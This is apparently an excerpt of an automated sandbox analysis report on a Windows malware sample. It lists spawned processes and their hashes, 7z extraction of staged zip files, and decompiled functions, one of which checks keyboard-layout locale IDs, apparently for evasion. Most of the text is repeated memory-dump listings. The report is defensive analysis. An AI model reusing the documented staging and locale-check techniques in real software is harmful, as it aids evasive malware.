Commandline:	"C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe"
Imagebase:	0x120000
File size:	727'552 bytes
MD5 hash:	28E568616A7B792CAC1726DEB77D9039
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	17:59:15
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	17:59:17
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_6.zip -oextracted
Imagebase:	0x670000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	17:59:18
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_5.zip -oextracted
Imagebase:	0x670000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	51
Start time:	17:59:18
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe"
Imagebase:	0xce0000
File size:	1'870'848 bytes
MD5 hash:	6255D0D884765ABD3BB418F367CAA8E9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	52
Start time:	17:59:18
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe"
Imagebase:	0x120000
File size:	727'552 bytes
MD5 hash:	28E568616A7B792CAC1726DEB77D9039
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.1%
Total number of Nodes:	748
Total number of Limit Nodes:	13

Executed Functions

Function 006E652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,006E652A,?,?,?,?,?,006E7661), ref: 006E6567

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 4cb36fb445b776eee3a3d22c50a55b61e6b2946d55086f0ace4fd272fbdef19f
Instruction ID: 794964e88bbfbd913561562c68ff67a89a49e5718605f99594cc29c895b1c7cc
Opcode Fuzzy Hash: 4cb36fb445b776eee3a3d22c50a55b61e6b2946d55086f0ace4fd272fbdef19f
Instruction Fuzzy Hash: 4FE08631242388AECF357B19CC4DD883F5AEB617C1F100804F81446221DB25ED41C580

Function 053E0687 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1772689383.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80341d06ab69efaf314555b29fad39039fd1e52f5630a396c315f5224860908e
Instruction ID: 3c0c1feee8534260fb72a3affb8747d0e6d6bc8b1590d125cdde9fd3769f87e5
Opcode Fuzzy Hash: 80341d06ab69efaf314555b29fad39039fd1e52f5630a396c315f5224860908e
Instruction Fuzzy Hash: 5D3107E710C270BDB10A91525F6DAF77FAEE6D3630730412AF442C99C2E2D54A8A8532

Function 053E06F3 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1772689383.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7649fd5e4a4ea46a11a99c067dab6439b885c0dddc3686e41c9567d88fcc788f
Instruction ID: 15ee137fa142f9e452468bdaa8048fee1464ae63c562d51d00e4b73fba1a91a1
Opcode Fuzzy Hash: 7649fd5e4a4ea46a11a99c067dab6439b885c0dddc3686e41c9567d88fcc788f
Instruction Fuzzy Hash: FFF0F4A211C230FCB20DD0956F9DAF76BAFE286771B304216F803C4DD1A3E44A459C71

Function 006B5C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Keyboard Layout\Preload, xrefs: 006B6054
00000422, xrefs: 006B60C9
00000419, xrefs: 006B6098
00000423, xrefs: 006B60FA
0000043f, xrefs: 006B612B

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 6e354a561bda7df70e75b7e4c6f4744fbe4e2878bd07b5ff1ca83a048ead5d4f
Instruction ID: 09bcfd0fdaf7e459f9185939d5ac0a0a361290da208fa4149bd864a1683f540d
Opcode Fuzzy Hash: 6e354a561bda7df70e75b7e4c6f4744fbe4e2878bd07b5ff1ca83a048ead5d4f
Instruction Fuzzy Hash: 2FF1B1B0A002589FDB24DF54CC85BEEBBBAEF44304F5042ADF519A7281DB749A84CB95

Function 006B9BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 006BA963
CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981

Strings

T2q, xrefs: 006BA970

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2q
API String ID: 1464230837-1585859237
Opcode ID: 5d331bf1f00f59a988503698eaa8b4ecced67cb12a93d828c595b0031365ef99
Instruction ID: f5f2e26d7145df5373c309b7bdbb8ab7637a2c532e7f7e3e3a9e3326aa85933d
Opcode Fuzzy Hash: 5d331bf1f00f59a988503698eaa8b4ecced67cb12a93d828c595b0031365ef99
Instruction Fuzzy Hash: 07311CB1B142049BEB18AB7CDC89BEDBBA3EB86310F248259E014D73D5C77949C18765

Function 006B9F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 006BA963
CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981

Strings

T2q, xrefs: 006BA970

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
